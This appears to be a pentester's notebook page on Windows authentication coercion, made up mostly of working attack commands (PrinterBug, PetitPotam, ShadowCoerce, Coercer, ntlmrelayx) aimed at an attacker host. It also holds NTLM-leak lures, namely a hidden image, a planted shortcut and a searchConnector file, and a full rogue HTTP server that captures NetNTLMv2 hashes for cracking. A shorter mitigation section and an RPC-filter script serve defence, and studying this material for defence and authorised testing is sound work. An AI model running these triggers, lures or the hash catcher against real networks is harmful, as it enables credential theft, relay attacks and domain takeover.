Pentester's Promiscuous Notebook
Authentication Coercion

Last updated 18 days ago

It's a good idea to check if NTLMv1 downgrade is possible when triggering the callbacks.

Printer Bug (MS-RPRN)

Check if the Spooler service is running by asking the RPC endpoint mapper whether the MS-RPRN / MS-PAR interfaces are registered:

$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR

SpoolSample

Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt

dementor.py

$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local

printerbug.py

$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt

PetitPotam (MS-EFSR)

CVE-2021-36942

$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1

PetitPotam can be triggered against any host (not only a DC that allows null sessions to the IPC$ share) without initial credentials by proxying the trigger through an authenticated SMB session obtained by relaying a DC's machine account:

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./Responder.py -I eth0 -vA 
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11

NTLM relay DC1$ to EXCH1 to get a SOCKS session ➡️ PetitPotam EXCH1 through the SOCKS proxy as DC1$ ➡️ NTLM relay EXCH1$ to EXCH2 to dump hashes

With Kerberos authentication:

$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local

Theory

All of the triggers above abuse the same pattern: a remotely callable RPC method that takes a UNC path as an argument (EfsRpcOpenFileRaw / EfsRpcEncryptFileSrv in MS-EFSR, RpcRemoteFindFirstPrinterChangeNotificationEx in MS-RPRN, IsPathSupported / IsPathShadowCopied in MS-FSRVP, ElfrOpenBELW in MS-EVEN). The service implementing the method opens that path itself, so the target authenticates to the host named in the path with its own machine account (NTLM, or Kerberos when the path names a host the target can get a ticket for), and that authentication can be captured or relayed. MS-EFSR is exposed over the \pipe\lsarpc and \pipe\efsrpc named pipes, which is why PetitPotam needed no credentials at all before the CVE-2021-36942 fix.

Mitigation

The CVE-2021-36942 patch removes the unauthenticated EfsRpcOpenFileRaw path but leaves the authenticated MS-EFSR methods. Blocking the MS-EFSR interface UUIDs with RPC filters (netsh rpc filter, or the RPC firewall linked at the end of the page) closes those; MS-RPRN can only be stopped by disabling the Spooler on hosts that do not need to print. Since a coerced authentication is only useful when it can be captured or relayed, require SMB signing and LDAP signing / channel binding, enable Extended Protection for Authentication on relay targets (AD CS web enrollment, Exchange), and disable the WebClient service where it is not needed so that no HTTP callback is available.
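The endpoint-mapper check under Printer Bug and the RPC-filter mitigation above, as one added example (not code from the original notebook): it parses rpcdump.py output for the interface UUIDs of the protocols coerced on this page (MS-RPRN, MS-PAR, MS-EFSR, MS-FSRVP, MS-EVEN) and renders a netsh rpc filter script that blocks the chosen ones. The UUIDs are the ones from the respective MS-* specifications, the sample rpcdump output is constructed, and the function names are my own. Mind the caveat in the code: the endpoint mapper lists only interfaces registered with it, so a clean result says nothing about the named-pipe paths (MS-EFSR over \pipe\lsarpc and \pipe\efsrpc), which Coercer probes directly.

```python
"""Added example (not from the original page): find coercion-capable RPC interfaces
in rpcdump.py output and render the matching `netsh rpc filter` block rules."""
import re

# Interface UUIDs of the protocols this page coerces through, taken from their MS-* specs.
COERCION_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN (spoolss, PrinterBug)",
    "76f03f96-cdfd-44fc-a22c-64950a001209": "MS-PAR (async spooler, PrinterBug)",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": "MS-EFSR via \\pipe\\lsarpc (PetitPotam)",
    "df1941c5-fe89-4e79-bf10-463657acf44d": "MS-EFSR via \\pipe\\efsrpc (PetitPotam)",
    "a8e0653c-2744-4389-a61d-7373df8b2292": "MS-FSRVP (ShadowCoerce)",
    "82273fdc-e32a-18c3-3f78-827929dc23ea": "MS-EVEN (EvilentCoerce)",
}

UUID_RE = re.compile(r"^UUID\s*:\s*([0-9a-f-]{36})\s+v([\d.]+)", re.I)


def parse_rpcdump(text):
    """Parse impacket rpcdump.py output into {uuid: {"version", "bindings"}}."""
    endpoints, current = {}, None
    for line in text.splitlines():
        m = UUID_RE.match(line.strip())
        if m:
            current = endpoints.setdefault(m.group(1).lower(), {"version": m.group(2), "bindings": []})
        elif current is not None and re.match(r"^\s+nca\w+:", line):
            current["bindings"].append(line.strip())     # indented binding strings follow "Bindings:"
        elif not line.strip():
            current = None                                # records are blank-line separated
    return endpoints


def coercible(text):
    """Known coercion interfaces the host registered with the endpoint mapper.
    Absence here is not proof of safety: MS-EFSR is reached over SMB named pipes and
    need not be registered with the EPM at all (Coercer probes the pipes directly)."""
    found = parse_rpcdump(text)
    return {u: (COERCION_INTERFACES[u], found[u]) for u in COERCION_INTERFACES if u in found}


def netsh_rpc_filter_script(uuids):
    """Render a netsh script (load as admin with `netsh -f rules.txt`) that blocks calls
    to the given interface UUIDs for every caller. Blocking MS-RPRN this way also kills
    remote printing, so on print servers filter EFSR/FSRVP only and rely on the
    CVE-2021-36942 patch plus relay hardening (SMB signing, EPA) for the rest."""
    lines = ["rpc filter"]
    for u in uuids:
        lines += ["add rule layer=um actiontype=block",
                  f"add condition field=if_uuid matchtype=equal data={u}",
                  "add filter"]
    return "\n".join(lines + ["quit"]) + "\n"


# Constructed rpcdump.py-style output (not a real capture), in the shape the
# `rpcdump.py ... | grep -A2 -e MS-RPRN -e MS-PAR` check above greps through.
SAMPLE_RPCDUMP = """\
[*] Retrieving endpoint list from 192.168.1.11
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.11[49668]
          ncalrpc:[spoolss]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:192.168.1.11[49669]

Protocol: [MS-FSRVP]: File Server Remote VSS Protocol
Provider: N/A
UUID    : A8E0653C-2744-4389-A61D-7373DF8B2292 v1.0
Bindings:
          ncacn_np:\\\\DC01[\\pipe\\FssagentRpc]
"""

if __name__ == "__main__":
    import sys
    hits = coercible(sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RPCDUMP)
    for uuid, (name, ep) in hits.items():
        print(f"[+] {name}: {uuid} v{ep['version']} -> {', '.join(ep['bindings'])}")
    # filter everything found except the spooler interface (see netsh_rpc_filter_script)
    print(netsh_rpc_filter_script(u for u in hits if "MS-RPRN" not in hits[u][0]))
```

Pipe real output in with `rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | python3 coerce_surface.py`; with no stdin it runs on the constructed sample. The generated script is a starting point for a filter policy, not a drop-in: test it on a host before rolling it out, and list active filters afterwards with `netsh rpc filter show filter`.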

ShadowCoerce (MS-FSRVP)

$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11

EvilentCoerce (MS-EVEN)

WebDAV (WebClient)

Check if a callback via WebDAV (HTTP) is possible. It is when the WebClient service is running on the target. If it is, NTLM relay to LDAPS on behalf of the relayed machine account is your chance for RBCD workstation takeover (an HTTP authentication carries no signing requirement, unlike one coerced over SMB).

Check via PowerShell (the pipe exists only while WebClient is running):

PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'

Check via CME:

$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'

Check via GetWebDAVStatus:

PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put the .searchConnector-ms file on a writable share. When a domain user opens the target folder in Explorer, the WebClient service starts automatically:

Documents.searchConnector-ms
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>

CVE-2022-30216

NTLM Leak

Leak with PowerShell:

PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html

Leak with Python (WinHTTP COM object with auto-logon forced to "always"):

import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)  # AutoLogonPolicy_Always: send the logged-on user's credentials to any host
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)

Leak with rpcping (catch with Responder's DCE-RPC listener):

Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM

Leak with a hidden image:

<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />

Leak with a shortcut:

lnk.ps1
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()

Leak with curl:

Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html
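The catching side of all the leaks above, as an added example (not Responder's code and not from the original page): a minimal HTTP listener that drives the NTLM handshake (401, Type 1 in, Type 2 out, Type 3 in) and prints the NetNTLMv2 response in hashcat -m 5600 format. The server challenge, the target names in the Type 2 message and the sample Type 3 message are constructed; OPTIONS and PROPFIND are answered like GET so that a WebClient (WebDAV) callback of the attacker@80/test.txt kind also reaches the handshake. Use Responder for real engagements; this shows what a captured blob actually contains.

```python
"""Added example (not Responder's or the page's code): catch NTLM auth over HTTP
and print the leaked NetNTLMv2 response in hashcat -m 5600 format."""
import base64
import struct
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

SERVER_CHALLENGE = bytes.fromhex("1122334455667788")  # fixed (constructed), like Responder's default
# Unicode|RequestTarget|Sign|NTLM|AlwaysSign|TargetTypeServer|ExtSessSec|TargetInfo|Version|128|KeyExch|56
TYPE2_FLAGS = 0xE28A8215
NTLM_VERSION = bytes([10, 0, 0, 0, 0, 0, 0, 15])          # Win10-style Version field


def _av_pair(av_id, value):
    data = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


def build_type2(target="MEGACORP", server="ATTACKER"):
    """CHALLENGE_MESSAGE the rogue server returns after the client's NEGOTIATE (Type 1).
    The header is 56 bytes, so the payload (TargetName, then TargetInfo) starts at 56."""
    name = target.encode("utf-16-le")
    info = _av_pair(2, target) + _av_pair(1, server) + struct.pack("<HH", 0, 0)  # NbDomain, NbComputer, EOL
    msg = b"NTLMSSP\0" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), 56)
    msg += struct.pack("<I", TYPE2_FLAGS) + SERVER_CHALLENGE + b"\0" * 8
    msg += struct.pack("<HHI", len(info), len(info), 56 + len(name)) + NTLM_VERSION
    return msg + name + info


def _field(msg, off):
    """Resolve a (Len, MaxLen, Offset) descriptor to the bytes it points at."""
    length, _, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_type3(msg):
    """AUTHENTICATE_MESSAGE (Type 3) -> user/domain/host and the NT response split into
    NTProofStr (16 bytes) and the NTLMv2 blob; a 24-byte NT response means NTLMv1."""
    if msg[:8] != b"NTLMSSP\0" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    nt = _field(msg, 20)
    info = {"domain": _field(msg, 28).decode("utf-16-le"),
            "user": _field(msg, 36).decode("utf-16-le"),
            "host": _field(msg, 44).decode("utf-16-le"),
            "ntlmv2": len(nt) > 24}
    info["nt_proof"], info["blob"] = (nt[:16].hex(), nt[16:].hex()) if info["ntlmv2"] else (nt.hex(), "")
    return info


def hashcat_line(info, challenge=SERVER_CHALLENGE):
    """NetNTLMv2 line for hashcat -m 5600 (NTLMv1, -m 5500, needs the LM response too)."""
    return f"{info['user']}::{info['domain']}:{challenge.hex()}:{info['nt_proof']}:{info['blob']}"


class Catcher(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"   # NTLM is connection-bound: Type 3 must arrive on the same socket

    def _reply(self, code, auth_header=None):
        self.send_response(code)
        if auth_header:
            self.send_header("WWW-Authenticate", auth_header)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        if not auth.startswith("NTLM "):
            return self._reply(401, "NTLM")                           # ask for NTLM
        msg = base64.b64decode(auth[5:])
        if struct.unpack_from("<I", msg, 8)[0] == 1:                  # NEGOTIATE -> CHALLENGE
            return self._reply(401, "NTLM " + base64.b64encode(build_type2()).decode())
        print(f"[{self.client_address[0]}] " + hashcat_line(parse_type3(msg)))
        self._reply(200)

    do_OPTIONS = do_PROPFIND = do_GET   # WebClient (WebDAV) callbacks start with these
    log_message = lambda *a: None


def build_type3_sample():
    """Constructed Type 3 (not a real capture) for exercising the parser offline."""
    fields = [b"\0" * 24,                                              # LM response
              bytes.fromhex("aa" * 16 + "0101000000000000" + "bb" * 32),  # NTProofStr + blob
              "MEGACORP".encode("utf-16-le"), "snovvcrash".encode("utf-16-le"),
              "WS01".encode("utf-16-le"), b""]                        # domain, user, host, session key
    hdr, payload = b"NTLMSSP\0" + struct.pack("<I", 3), b""
    for f in fields:                                                  # header is 88 bytes incl. Version + MIC
        hdr += struct.pack("<HHI", len(f), len(f), 88 + len(payload))
        payload += f
    return hdr + struct.pack("<I", TYPE2_FLAGS) + NTLM_VERSION + b"\0" * 16 + payload


if __name__ == "__main__":
    print(hashcat_line(parse_type3(build_type3_sample())))            # offline self-check
    ThreadingHTTPServer(("0.0.0.0", 80), Catcher).serve_forever()     # port 80 needs root
```

Run it as root on the attacker host and point any trigger above at attacker@80/test.txt (or at http://10.10.13.37/index.html for the client-side leaks); each printed line feeds hashcat -m 5600 directly. The fixed server challenge is what makes a captured NTLMv1 response (24-byte NT response) crackable with rainbow tables, which is why the NTLMv1 downgrade check at the top of the page matters.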

Tools

Coercer

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1

References

https://github.com/leechristensen/SpoolSample
https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1
https://github.com/0x00ach/stuff/blob/master/MS-RPRN.exe
https://github.com/BeetleChunks/SpoolSploit
https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
https://github.com/topotam/PetitPotam
https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-Petitpotam.ps1
https://gist.github.com/leechristensen/fda130890fb3c194115e7b856640c30e
https://github.com/ly4k/PetitPotam
https://www.tiraniddo.dev/2021/08/how-windows-firewall-rpc-filter-works.html
https://www.tiraniddo.dev/2021/08/how-to-secure-windows-rpc-server-and.html
https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
https://itm4n.github.io/from-rpcview-to-petitpotam/
https://clearbluejar.github.io/posts/from-ntobjectmanager-to-petitpotam/
https://kb.cert.org/vuls/id/405600
https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
https://github.com/zeronetworks/rpcfirewall
https://pentestlaboratories.com/2022/01/11/shadowcoerce/
https://github.com/ShutdownRepo/ShadowCoerce
https://habr.com/ru/companies/tomhunter/articles/907068/
https://github.com/Thunter-HackTeam/EvilentCoerce
https://pentestlab.blog/2021/10/20/lateral-movement-webclient/
https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
https://github.com/Hackndo/WebclientServiceScanner
https://www.akamai.com/blog/security/authentication-coercion-windows-server-service
https://github.com/akamai/akamai-security-research/tree/main/cve-2022-30216
https://github.com/xct/hashgrab
https://github.com/Gl3bGl4z/All_NTLM_leak
https://github.com/p0dalirius/Coercer
https://github.com/p0dalirius/windows-coerced-authentication-methods
https://habr.com/ru/post/688682/
https://twitter.com/DebugPrivilege/status/1410158556540719104